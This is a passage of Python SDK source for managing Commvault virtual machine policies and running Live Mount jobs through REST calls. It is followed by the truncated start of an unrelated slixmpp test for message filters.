payload=vm_policy_json)\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to create virtual machine policy\\nError: \"{0}\"'.format(\n error_message)\n\n raise SDKException('Virtual Machine', '102', o_str)\n # return object of VirtualMachinePolicy if there is no error in response\n self.refresh()\n return VirtualMachinePolicy(\n self._commcell_object,\n vm_policy_json['policy']['entity']['vmAllocPolicyName'],\n int(vm_policy_json['policy']['entity']['policyType']),\n int(self._vm_policies[vm_policy_json['policy']['entity']\n ['vmAllocPolicyName']]['id'])\n )\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _prepare_add_vmpolicy_json_livemount(self, vm_policy_options, _vm_policy_json):\n \"\"\"Sets values for creating the add policy json that are specific for creating Live Mount\n policy.\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n\n _vm_policy_json (dict) -- vm policy json to which Live Mount policy specific\n information is added\n \"\"\"\n _media_agent_json = self._media_agent_json(vm_policy_options)\n\n _vm_policy_json['policy']['minutesRetainUntil'] = vm_policy_options.get(\n 'minutesRetainUntil', 1)\n\n _vm_policy_json['policy']['mediaAgent'] = _media_agent_json\n\n @staticmethod\n def _security_associations_json(vm_policy_options):\n \"\"\"Returns json for the security associations in the add policy json\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n \"\"\"\n _users = []\n if 'users' in vm_policy_options:\n # TODO: get user info using REST API. For every user, add user dict to _users\n pass\n else:\n # default - admin\n default_user = {\n \"_type_\": 13,\n \"userGUID\": \"admin\",\n \"userName\": \"admin\",\n \"userId\": 1\n }\n _users.append(default_user)\n\n _usergroups = []\n if 'userGroups' in vm_policy_options:\n # TODO: get usergroups info using REST API. For every userGroup, add corresponding dict\n pass\n\n _security_associations = {}\n if _users:\n _security_associations['users'] = _users\n if _usergroups:\n _security_associations['userGroups'] = _usergroups\n\n return _security_associations\n\n @staticmethod\n def _network_names_json(vm_policy_options):\n \"\"\"Returns list of network names for the add policy json\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n\n Returns:\n _network_names (list) -- list of network names (str)\n \"\"\"\n _network_names = []\n if 'networkNames' in vm_policy_options:\n for network in vm_policy_options['networkNames']:\n _network_names.append(network)\n\n return _network_names\n\n def _media_agent_json(self, vm_policy_options):\n \"\"\"Returns json for the media agent json value in the add policy json (only for LM)\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user (optional)\n\n Returns:\n _media_agent_json (dict) -- json containing media agent information if media\n agent info is passed by user\n \"\"\"\n _media_agent_json = {}\n if 'mediaAgent' in vm_policy_options:\n # TODO: there can be only one MA -- validate this (whole vm_policy_options)\n media_agent = vm_policy_options['mediaAgent']\n if not self._commcell_object.media_agents.has_media_agent(media_agent):\n raise SDKException(\n 'Virtual Machine', '102',\n 'No media agent exists \"{0}\" exists in commserv \"{1}\"'.format(\n media_agent, self._commcell_object.commserv_name))\n else:\n _media_agent_json['clientName'] = media_agent\n else: # adding a default media agent for automation\n media_agent_dict = self._commcell_object.media_agents._media_agents\n media_agent = [ma for ma in media_agent_dict][0]\n _media_agent_json['clientName'] = media_agent\n\n return _media_agent_json\n\n @staticmethod\n def _entity_json(vm_policy_options):\n \"\"\"Returns json for the entity attribute in the add policy json\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n\n Returns:\n _entity (dict) -- json for the entity attribute in add policy json\n \"\"\"\n _entity = {\n 'vmAllocPolicyName': vm_policy_options['vmAllocPolicyName'],\n '_type_': 93, # hardcoded\n 'policyType': vm_policy_options[\"policyType\"],\n 'region': {},\n }\n\n return _entity\n\n def has_policy(self, vm_policy_name):\n \"\"\"Checks if a Virtual Machine policy exists with the given name\n\n Args:\n policy_name (str) -- name of the vm policy\n\n Returns:\n bool - boolean output whether the vm policy exists in the commcell or not\n\n Raises:\n SDKException:\n if type of the vm policy name argument is not string\n \"\"\"\n if not isinstance(vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n\n return (self._vm_policies and\n vm_policy_name.lower() in self._vm_policies)\n\n def get(self, vm_policy_name):\n \"\"\"Returns a VirtualMachinePolicy object of the specified virtual machine policy name.\n\n Args:\n vm_policy_name (str) -- name of the virtual machine policy\n\n Returns:\n object - instance of the VirtualMachinePolicy class for the given policy name\n\n Raises:\n SDKException:\n if type of the virtual machine policy name argument is not string\n if no virtual machine policy exists with the given name\n \"\"\"\n if not isinstance(vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n\n vm_policy_name = vm_policy_name.lower()\n if self.has_policy(vm_policy_name):\n vm_policy_type_id = int(self._vm_policies[vm_policy_name]['policyType'])\n return VirtualMachinePolicy(\n self._commcell_object,\n vm_policy_name=vm_policy_name,\n vm_policy_type_id=vm_policy_type_id,\n vm_policy_id=int(self._vm_policies[vm_policy_name]['id'])\n )\n else:\n raise SDKException(\n 'Virtual Machine',\n '102',\n 'No policy exists with name: {0}'.format(vm_policy_name))\n\n def add(\n self,\n vm_policy_name,\n vm_policy_type,\n vclient_name,\n vm_policy_options=None\n ):\n \"\"\"Adds a new Virtual Machine Policy to the Commcell.\n\n Args:\n vm_policy_name (str) -- name of the new virtual machine policy to add to\n the Commcell instance\n\n vm_policy_type (str) -- type of virtual machine policy to be added\n [\"Live Mount\", \"Clone From Template\",\n \"Restore From Backup\"]\n\n vclient_name (str) -- the name of the virtualization client under which\n vm policy is to be added\n\n vm_policy_options (dict) -- optional dictionary passed by user to create a vm\n policy. Allowed key-value pairs and input types\n are given below\n default: None\n\n \"allDataStoresSelected\" (Boolean) : if all data stores are to be selected;\n matters only if migrateVMs is set\n to True,\n \"daysRetainUntil\" (int) : how many days to retain backup until,\n \"migrateVMs\" (Boolean) : migrate to datastore after expiry\n (only for LiveMount),\n \"senderEmailId\" (str) : email id of sender,\n \"minutesRetainUntil\" (int) : how many days to retain backup until\n \"notifyToEmailIds\" (str) : email id's to notify to; multiple\n emails separated by a comma\n \"quotaType\" (int) : number of vm's/live mounts/labs per\n user,\n \"maxVMQuota\" (int) : maximum number of VM quota,\n \"namingPattern\" (str) : naming patter,\n \"description\" (str) : description of vm policy,\n \"enabled\" (Boolean) : whether vm policy is enabled or not,\n \"allowRenewals\" (Boolean) : whether to allow renewals or not,\n \"disableSuccessEmail\" (Boolean) : send email on succesful creation of vm\n policy,\n \"allESXServersSelected\" (Boolean) : select all esx servers in the vcenter,\n \"dataCenterName\" (str) : data center name for vm policy,\n \"dataStores\" list(str) : list of data store names,\n \"esxServers\" list(str) : list of esx server names,\n \"users\" list(str) : list of users (user-names) to add to vm\n policy,\n \"userGroups\" list(str) : list of usergroups (usergroup-names) to\n add to vm policy,\n \"networkNames\" list(str) : list of network names,\n ------------------------ only for Live Mount ------------------------\n \"mediaAgent\" (str) : media agent name for Live Mount,\n \"performAutoMigration\" (Boolean) : automatic migration of vm\n\n Returns:\n object -- object of the corresponding virtual machine policy type\n\n Raises:\n SDKException:\n if type of the vm policy name argument is not string\n\n if type of the vcenter name argument is not string\n\n if type of virtualization client name argument is not string or None\n\n if policy type is not one of the virtual machine policy types as defined\n\n if the type of vm_policy_options is not dict or None\n\n if vm policy already exists with the given name (case insensitive)\n\n if failed to create vm policy\n\n if response is empty\n\n if response is not success\n \"\"\"\n vm_policy_name = vm_policy_name.lower()\n vm_policy_type = vm_policy_type.lower()\n vclient_name = vclient_name.lower()\n _vm_policy_types = {'live mount': 4,\n 'clone from template': 0,\n 'restore from backup': 13}\n self.refresh()\n if (\n not isinstance(vm_policy_name, str)\n or not isinstance(vclient_name, str)\n or not isinstance(vm_policy_options, (dict, type(None)))\n ):\n raise SDKException('Virtual Machine', '101')\n elif vm_policy_type not in _vm_policy_types:\n err_msg = '{0} is not a valid virtual machine policy type.'.format(\n vm_policy_type)\n raise SDKException('Virtual Machine', '102', err_msg)\n elif self.has_policy(vm_policy_name):\n err_msg = 'Virtual Machine Policy \"{0}\" already exists (not case sensitive)'.format(\n vm_policy_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n if not vm_policy_options:\n vm_policy_options = {}\n vm_policy_options['vmAllocPolicyName'] = vm_policy_name.lower()\n\n # setting the vclient name, vcenter name and policy type\n self._set_vclient_and_vcenter_names(vm_policy_options, vclient_name)\n vm_policy_options['policyType'] = _vm_policy_types[vm_policy_type]\n\n # preparing the json values for adding the new policy\n _vm_policy_json = self._prepare_add_vmpolicy_json_default(vm_policy_options)\n\n # passing the built json to create the vm policy\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n method='POST', url=self._VMPOLICIES_URL, payload=_vm_policy_json)\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to create virtual machine policy\\nError: \"{0}\"'.format(\n error_message)\n raise SDKException('Virtual Machine', '102', o_str)\n # returning object of VirtualMachinePolicy if there is no error in response\n self.refresh()\n return VirtualMachinePolicy(\n self._commcell_object,\n vm_policy_name=vm_policy_options['vmAllocPolicyName'],\n vm_policy_type_id=int(vm_policy_options['policyType']),\n vm_policy_id=int(self._vm_policies[vm_policy_name]['id']))\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def delete(self, vm_policy_name):\n \"\"\"Deletes the specified virtual machine policy from the commcell.\n\n Args:\n vm_policy_name (str) -- name of the virtual machine policy to delete\n\n Raises:\n SDKException:\n if type of the virtual machine policy name argument is not string\n\n if failed to delete virtual machine policy\n\n if response is empty\n\n if response is not success\n \"\"\"\n if not isinstance(vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n\n if self.has_policy(vm_policy_name):\n # retrieving the corresponding policy id for API call\n vm_policy_id = self._get_vm_policies()[vm_policy_name]['id']\n policy_delete_url = self._VMPOLICIES_URL + '/{0}'.format(vm_policy_id)\n\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n 'DELETE', policy_delete_url)\n\n if flag:\n try:\n if response.json():\n if 'errorCode' in response.json() and 'errorMessage' in response.json():\n error_message = response.json()['errorMessage']\n output_string = 'Failed to delete virtual machine policy\\nError: \"{0}\"'\n raise SDKException(\n 'Virtual Machine', '102', output_string.format(error_message))\n except ValueError:\n if response.text:\n self.refresh()\n return response.text.strip()\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n else:\n raise SDKException(\n 'Virtual Machine',\n '102',\n 'No policy exists with name: {0}'.format(vm_policy_name))\n\n def refresh(self):\n \"\"\"Refresh the Virtual Machine policies.\"\"\"\n self._vm_policies = self._get_vm_policies()\n\n\nclass VirtualMachinePolicy(object):\n \"\"\"Class for representing a single Virtual Machine Policy. Contains method definitions for\n common operations among all VM Policies\"\"\"\n\n def __new__(\n cls,\n commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id=None\n ):\n \"\"\"Decides which instance object needs to be created\"\"\"\n if vm_policy_type_id == 4 or vm_policy_type_id == 2: # for 'Live Mount'\n return object.__new__(LiveMountPolicy)\n # TODO: future support for 'Clone From Template'\n elif vm_policy_type_id == 6:\n return object.__new__(VirtualMachinePolicy)\n # TODO: future support for 'Restore From Backup'\n else:\n return object.__new__(VirtualMachinePolicy)\n\n def __init__(\n self,\n commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id=None\n ):\n \"\"\"Initialize object of the VirtualMachinePolicy class.\n\n Args:\n commcell_object (object) -- instance of the Commcell class\n vm_policy_name (str) -- name of the vm policy to be created\n vm_policy_type_id (int) -- type of policy (integer code for vm policy)\n vm_policy_id (int) -- vm policy id if available (optional)\n\n Returns:\n object -- instance of the VirtualMachinePolicy class\n \"\"\"\n self._commcell_object = commcell_object\n self._vm_policy_name = vm_policy_name\n self._vm_policy_type_id = vm_policy_type_id\n\n if vm_policy_id:\n self._vm_policy_id = str(vm_policy_id)\n else:\n self._vm_policy_id = self._get_vm_policy_id()\n\n self._VM_POLICY_URL = (self._commcell_object._services['GET_VM_ALLOCATION_POLICY']\n % self._vm_policy_id)\n\n self._vm_policy_properties = None\n self.refresh()\n\n def __repr__(self):\n \"\"\"Representation string for the instance of this class.\"\"\"\n return (\"VirtualMachinePolicy class instance for Virtual Machine Policy: '{0}' for \"\n \"Commcell: '{1}'\".format(self.vm_policy_name, self._commcell_object.commserv_name))\n\n def _get_vm_policy_id(self):\n \"\"\"Gets the virtual machine policy id associated with the svirtual machine policy\"\"\"\n vm_policies = VirtualMachinePolicies(self._commcell_object)\n return vm_policies.get(self.vm_policy_name).vm_policy_id\n\n def _get_vm_policy_properties(self):\n \"\"\"Gets the properties of the virtual machine policy.\n\n Returns:\n dict -- dictionary consisting of the properties of this vm policy\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n \"\"\"\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'GET', self._VM_POLICY_URL\n )\n\n if flag:\n if response.json()['policy'][0]: # API returns an array with one element\n return response.json()['policy'][0]\n else:\n raise SDKException('Response', 102)\n else:\n response_str = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', 101, response_str)\n\n def _update_vm_policy(self):\n \"\"\"Updates the vm policy using a PUT request with the updated properties json.\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n \"\"\"\n update_policy_json = {\n 'action': 1, # action 1 for PUT\n 'policy': self._vm_policy_properties\n }\n\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'PUT', self._VM_POLICY_URL, update_policy_json\n )\n\n self.refresh()\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to update virtual machine policy\\nError: \"{0}\"'.format(\n error_message)\n raise SDKException('Virtual Machine', '102', o_str)\n else:\n raise SDKException('Response', '102')\n else:\n response_str = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_str)\n\n @property\n def vm_policy_name(self):\n \"\"\"Treats the virtual machine policy name as a read-only attribute.\"\"\"\n return self._vm_policy_name\n\n @property\n def vm_policy_id(self):\n \"\"\"Treats the virtual machine policy id as a read-only attribute.\"\"\"\n return self._vm_policy_id\n\n @property\n def vm_policy_type_id(self):\n \"\"\"Treats the virtual machine policy type id as a read-only attribute.\"\"\"\n return self._vm_policy_type_id\n\n def disable(self):\n \"\"\"Disables a virtual machine policy if it is enabled.\n\n Raises:\n SDKException:\n if vm policy is already disabled\n \"\"\"\n if not self._vm_policy_properties['enabled']:\n err_msg = 'Policy is already disabled'\n raise SDKException('Virtual Machine', '102', err_msg)\n\n self._vm_policy_properties['enabled'] = False\n self._update_vm_policy()\n\n def enable(self):\n \"\"\"Enables a virtual machine policy if it is disabled.\n\n Raises:\n SDKException:\n if vm policy is already enabled\n \"\"\"\n if self._vm_policy_properties['enabled']:\n err_msg = 'Policy is already enabled'\n raise SDKException('Virtual Machine', '102', err_msg)\n\n self._vm_policy_properties['enabled'] = True\n self._update_vm_policy()\n\n def clone(self, desired_vm_policy_name):\n \"\"\"\n copies properties of the particular VM Policy and creates a new VM Policy with the\n specified name\n\n Args:\n desired_vm_policy_name (str) -- name of the policy that is going to be created\n\n Returns:\n object -- object of the Virtual Machine Policy\n\n Raises:\n SDKException:\n if type of the desired vm policy name argument is not string\n\n if a vm policy already exists by the desired vm policy name\n \"\"\"\n vm_policies_object = VirtualMachinePolicies(self._commcell_object)\n if not isinstance(desired_vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n elif vm_policies_object.has_policy(desired_vm_policy_name):\n err_msg = 'Policy \"{0}\" already exists'.format(desired_vm_policy_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n import copy\n desired_vm_policy_properties = copy.deepcopy(self._vm_policy_properties)\n desired_vm_policy_name = desired_vm_policy_name.lower()\n desired_vm_policy_properties['entity']['vmAllocPolicyName'] = desired_vm_policy_name\n del desired_vm_policy_properties['entity']['vmAllocPolicyId']\n desired_vm_policy_json = {\n 'action': 0,\n 'policy': desired_vm_policy_properties\n }\n\n return vm_policies_object._clone_vm_policy(desired_vm_policy_json)\n\n # TODO: modify(self, vm_policy_details) - Modifies the policy as per the details passed\n\n def properties(self):\n \"\"\"Returns the virtual machine properties\"\"\"\n return self._vm_policy_properties\n\n def refresh(self):\n \"\"\"Refresh the Virtual Machine policy properties.\"\"\"\n self._vm_policy_properties = self._get_vm_policy_properties()\n\n\nclass LiveMountPolicy(VirtualMachinePolicy):\n \"\"\"Derived class from VirtualMachinePolicy base class for representing a single Live Mount\n Policy. Contains method definitions for operations specific for Live Mount and also\n runnning Live Mount job\"\"\"\n\n def __init__(\n self,\n commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id=None\n ):\n \"\"\"Initialize object of the LiveMountPolicy class.\n Args:\n commcell_object (object) -- instance of the Commcell class\n vm_policy_name (str) -- name of the Live Mount policy\n vm_policy_type_id (int) -- policy type id\n vm_policy_id (int) -- id of the Live Mount policy, if available\n\n Returns:\n object -- instance of the LiveMountPolicy class\n \"\"\"\n super(LiveMountPolicy, self).__init__(commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id)\n self._LIVE_MOUNT_JOB_URL = self._commcell_object._services['CREATE_TASK']\n self._QOPERATION_URL = self._commcell_object._services['EXECUTE_QCOMMAND']\n self._live_mounted_vm_name = None\n\n def _prepare_live_mount_json(self, live_mount_options):\n \"\"\"Sets values for creating the add policy json\n Args:\n live_mount_options (dict) -- live mount job options provided by user\n \"\"\"\n self._set_mounted_vm_name(live_mount_options)\n self._live_mounted_vm_name = live_mount_options['vmName']\n\n _associations = LiveMountPolicy.__associations_json(live_mount_options)\n _task = LiveMountPolicy._task_json()\n _subtask = LiveMountPolicy._subtask_json()\n _one_touch_response = LiveMountPolicy._one_touch_response_json(live_mount_options)\n _vm_entity = LiveMountPolicy._vm_entity_json(live_mount_options)\n _vm_info = LiveMountPolicy._vm_info_json(live_mount_options)\n\n # TODO: only if live mount is scheduled (non default)\n\n # TODO: _pattern = live_mount_json['taskInfo']['subTasks'][0]['pattern']\n\n # TODO: backupOpts = live_mount_json['taskInfo']['subTasks'][0]['options']['backupOpts']\n live_mount_json = {\n 'taskInfo': {\n 'associations': _associations,\n 'task': _task,\n 'subTasks': [\n {\n 'subTaskOperation': 1,\n 'subTask': _subtask,\n 'options': {\n 'adminOpts': {\n 'vmProvisioningOption': {\n 'operationType': 23,\n 'virtualMachineOption': [\n {\n 'powerOnVM': True,\n 'flags': 0,\n 'useLinkedClone': False,\n 'vendor': 1,\n 'doLinkedCloneFromLocalTemplateCopy': False,\n 'vmAllocPolicy': {\n 'vmAllocPolicyName': self._vm_policy_name\n },\n 'oneTouchResponse': _one_touch_response,\n 'vmEntity': _vm_entity,\n 'vmInfo': _vm_info\n }\n ]\n }\n }\n }\n }\n ]\n }\n }\n return live_mount_json\n\n def _set_mounted_vm_name(self, live_mount_options):\n \"\"\"\n Sets the vm name for the live mounted vm\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Raises:\n SDK Exception:\n if user passes a vm name that already exists as a hidden client on the Commcell\n \"\"\"\n clients = self._commcell_object.clients\n if 'vmName' in live_mount_options:\n if live_mount_options['vmName'].lower() in clients._hidden_clients:\n err_msg = 'A client already exists by the name \"{0}\"'.format(\n live_mount_options['vmName'])\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n vm_name = live_mount_options['clientName'] + 'VM'\n digit = 1\n while vm_name.lower() in clients._hidden_clients:\n vm_name += str(digit)\n live_mount_options['vmName'] = vm_name\n\n @staticmethod\n def __associations_json(live_mount_options):\n \"\"\"\n Sets the associations value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _associations (list) -- list containing the associations value\n \"\"\"\n _associations = []\n _associations_element = {\n # 'type': 0,\n 'clientName': live_mount_options['clientName'],\n # 'clientSidePackage': True,\n 'subclientName': '',\n 'backupsetName': '',\n 'instanceName': '',\n 'appName': '',\n # 'consumeLicense': True\n }\n _associations.append(_associations_element)\n return _associations\n\n @staticmethod\n def _task_json():\n \"\"\"Sets the task value for the live mount job json\n\n Returns:\n _task (dict) -- dict containing the task value\n \"\"\"\n _task = {\n 'taskType': 1,\n 'initiatedFrom': 2,\n 'alert': {\n 'alertName': ''\n },\n 'taskFlags': {\n 'disabled': False\n }\n }\n\n # TODO: if 'schedule' is there in options, change 06 07 json\n\n return _task\n\n @staticmethod\n def _subtask_json():\n \"\"\"Sets the subTask value for the live mount job json\n\n Returns:\n _subtask (dict) -- dict containing the subTask value\n \"\"\"\n _subtask = {\n 'subTaskType': 1,\n 'operationType': 4038\n }\n\n # TODO: if 'schedule' in live_mount_options: add subTaskName to json\n\n return _subtask\n\n @staticmethod\n def _one_touch_response_json(live_mount_options):\n \"\"\"Sets the oneTouchResponse value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _one_touch_response (dict) -- dict containing the oneTouchResponse value\n \"\"\"\n _csinfo = LiveMountPolicy._csinfo_json(live_mount_options)\n _hwconfig = LiveMountPolicy._hwconfig_json(live_mount_options)\n _netconfig = LiveMountPolicy._netconfig_json()\n _one_touch_response = {\n 'copyPrecedence': live_mount_options.get('copyPrecedence', 0),\n 'version': '',\n 'platform': 0,\n 'dateCreated': '',\n 'automationTest': False,\n 'autoReboot': True,\n 'csinfo': _csinfo,\n 'hwconfig': _hwconfig,\n 'netconfig': _netconfig,\n 'dataBrowseTime': live_mount_options.get('pointInTime', {}),\n 'maInfo': {\n 'clientName': ''\n },\n 'datastoreList': {}\n }\n\n return _one_touch_response\n\n @staticmethod\n def _csinfo_json(live_mount_options):\n \"\"\"Sets the csinfo value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _csinfo (dict) -- dict containing the hwconfig value\n \"\"\"\n _csinfo = {\n \"firewallPort\": 0,\n \"cvdPort\": 0,\n \"evmgrPort\": 0,\n \"fwClientGroupName\": \"\",\n \"mediaAgentInfo\": {},\n \"mediaAgentIP\": {},\n \"ip\": {},\n \"commservInfo\": {},\n \"creds\": {\n \"password\": \"\",\n \"domainName\": \"\",\n \"confirmPassword\": \"\",\n \"userName\": \"\"\n }\n }\n\n return _csinfo\n\n @staticmethod\n def _hwconfig_json(live_mount_options):\n \"\"\"Sets the hwconfig value for the live mount job json\n\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _hwconfig (dict) -- dict containing the hwconfig value\n \"\"\"\n _hwconfig = {\n 'vmName': live_mount_options['vmName'],\n 'magicno': '',\n 'bootFirmware': 0,\n 'version': '',\n 'mem_size': 0,\n 'cpu_count': 0,\n 'nic_count': 0,\n 'overwriteVm': False,\n 'useMtptSelection': False,\n 'ide_count': 0,\n 'mtpt_count': 0,\n 'scsi_count': 0,\n 'diskType': 1,\n 'optimizeStorage': False,\n 'systemDisk': {\n 'forceProvision': False,\n 'bus': 0,\n 'refcnt': 0,\n 'size': 0,\n 'name': '',\n 'dataStoreName': '',\n 'vm_disk_type': 0,\n 'slot': 0,\n 'diskType': 1,\n 'tx_type': 0\n }\n }\n\n return _hwconfig\n\n @staticmethod\n def _netconfig_json():\n \"\"\"Sets the netconfig value for the live mount job json\n\n Returns:\n _netconfig (dict) -- dict containing the netconfig value\n \"\"\"\n _netconfig = {\n 'wins': {\n 'useDhcp': False\n },\n 'firewall': {\n 'certificatePath': '',\n 'certificateBlob': '',\n 'configBlob': ''\n },\n 'dns': {\n 'suffix': '',\n 'useDhcp': False\n },\n 'ipinfo': {\n 'defaultgw': ''\n }\n }\n\n return _netconfig\n\n @staticmethod\n def _vm_entity_json(live_mount_options):\n \"\"\"Sets the vmEntity value for the live mount job json\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _vm_entity (dict) -- dict containing the vmEntity value\n \"\"\"\n _vm_entity = {\n 'vmName': live_mount_options['vmName'],\n 'clientName': live_mount_options['clientName'],\n '_type_': 88\n }\n\n return _vm_entity\n\n @staticmethod\n def _vm_info_json(live_mount_options):\n \"\"\"Sets the vmInfo value for the live mount job json\n Args:\n live_mount_options (dict) -- live mount job options\n\n Returns:\n _vm_info (dict) -- dict containing the vmInfo value\n \"\"\"\n _vm_info = {\n 'advancedProperties': {\n 'networkCards': [\n {\n 'label': live_mount_options.get('network_name', '')\n }\n ]\n },\n 'vm': {\n 'vmName': live_mount_options['vmName'],\n '_type_': 88\n }\n }\n\n # TODO: if 'original network' is chosen as option in livemount option, verify network json\n\n return _vm_info\n\n def _is_hidden_client(self, client_name):\n \"\"\"Checks if specified client is a hidden client for the Commcell instance\n\n Args:\n client_name (str) -- name of the client\n\n Returns:\n bool -- boolean output whether the client is indeed a hidden\n client in the Commcell\n \"\"\"\n clients = self._commcell_object.clients\n return clients.has_hidden_client(client_name)\n\n def _validate_live_mount(self, client_name):\n \"\"\"Check if the specified vm has a backup for live mount\n\n Args:\n client_name (str) -- name of the vm\n client_id (int) -- client_id of the vm\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n\n if there is an error in the response json\n \"\"\"\n clients = self._commcell_object.clients\n client_id = clients.get(client_name.lower()).client_id\n\n validate_live_mount_xml = (\n ''\n ''\n ''\n ''\n )\n response_json = self._commcell_object._qoperation_execute(\n request_xml=validate_live_mount_xml)\n\n if response_json['error']:\n if response_json['error']['errorCode'] != 0:\n err_msg = 'Unable to validate client \"{0}\" for live mount. Error: {1}'.format(\n client_name, response_json['error']['errorMessage'])\n raise SDKException('Virtual Machine', '102', err_msg)\n\n def view_active_mounts(self):\n \"\"\"View active mounts for this Live Mount policy instance\n\n Returns:\n response.json()['virtualMachines'] (list) -- list of dictionary containing\n information about the vm's\n that are currently mounted\n using this ive mount policy\n\n Raises:\n SDKException:\n if no response is found\n\n if response is not a success\n \"\"\"\n active_mount_xml = (''\n ''\n ''\n '')\n\n response_json = self._commcell_object._qoperation_execute(request_xml=active_mount_xml)\n\n if 'virtualMachines' in response_json:\n return response_json['virtualMachines']\n\n def live_mount(\n self,\n client_vm_name,\n live_mount_options=None\n ):\n \"\"\"Run Live Mount for this Live Mount policy instance\n\n Args:\n client_vm_name (str) -- client vm name for which live mount is to\n be run\n live_mount_options: (dict) -- list of optional parameters for each live\n mount job.\n Allowed key-value pairs and input types\n are given below\n default : None\n 'vmName' (str) : name of the new vm that will be mounted\n 'copyPrecedence' (int) : number for the storage policy copy to use\n Default value is zero (copy with highest\n precedence is used)\n 'pointInTime' (dict) : to select live mount from point in time,\n provide a dict with following key-value pairs\n \"timeValue\" (str) : date and time in below format\n \"yyyy-mm-dd hh:mm:ss\".\n \"2018-06-18 16:09:00\", for example.\n \"TimeZoneName\" (str) : time zone value in given format\n (MS Windows time zone options).\n \"(UTC-05:00) Eastern Time (US & Canada)\"\n }\n\n\n Raises:\n SDKException:\n if the vm name passed is not string\n\n if the vm name passed does not exist\n\n if a vm is not backed up\n\n if the destination vm name (if provided) is not a string\n\n if a vm with the destination vm name already exists (if provided)\n\n Returns:\n live_mount_job (object) -- Job object for the corresponding live\n mount job\n \"\"\"\n # check if client name is string\n if not isinstance(client_vm_name, str):\n raise SDKException('Virtual Machine', '101')\n # check if client is a valid hidden client\n elif not self._is_hidden_client(client_vm_name):\n err_msg = 'Client \"{0}\" not found in Commcell'.format(client_vm_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n # check if vm to be live mounted is backed up\n #self._validate_live_mount(client_vm_name)\n \n # default options if nothing is passed\n if not live_mount_options:\n live_mount_options = {}\n\n live_mount_options['clientName'] = client_vm_name\n\n live_mount_json = self._prepare_live_mount_json(live_mount_options)\n\n # making a POST call for running the Live Mount job\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'POST', self._LIVE_MOUNT_JOB_URL, live_mount_json\n )\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to run Live Mount\\nError: \"{0}\"'.format(error_message)\n raise SDKException('Virtual Machine', '102', o_str)\n # if no valid error in response\n if 'jobIds' in response.json():\n return Job(self._commcell_object, response.json()['jobIds'][0])\n else:\n raise SDKException('Virtual Machine', '102',\n 'Failed to run live mount')\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n @property\n def live_mounted_vm_name(self):\n \"\"\"Treats the live mounted vm name as a read-only attribute.\"\"\"\n return self._live_mounted_vm_name\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/virtualmachinepolicies.py","file_name":"virtualmachinepolicies.py","file_ext":"py","file_size_in_byte":59990,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"25805872395","text":"import asyncio\nimport unittest\nfrom slixmpp.test.integration import SlixIntegration\nfrom slixmpp import Message\n\n\nclass TestSlowFilter(SlixIntegration):\n async def asyncSetUp(self):\n await super().asyncSetUp()\n self.add_client(\n self.envjid('CI_ACCOUNT1'),\n self.envstr('CI_ACCOUNT1_PASSWORD'),\n )\n self.add_client(\n self.envjid('CI_ACCOUNT2'),\n self.envstr('CI_ACCOUNT2_PASSWORD'),\n )\n await self.connect_clients()\n\n async def test_filters(self):\n \"\"\"Make sure filters work\"\"\"\n def add_a(stanza):\n if isinstance(stanza, Message):\n stanza['body'] = stanza['body'] + ' a'\n return stanza\n\n async def add_b(stanza):\n if isinstance(stanza, Message):\n stanza['body'] = stanza['body'] + ' b'\n return stanza\n\n async def add_c_wait(stanza):\n if isinstance(stanza, Message):\n await 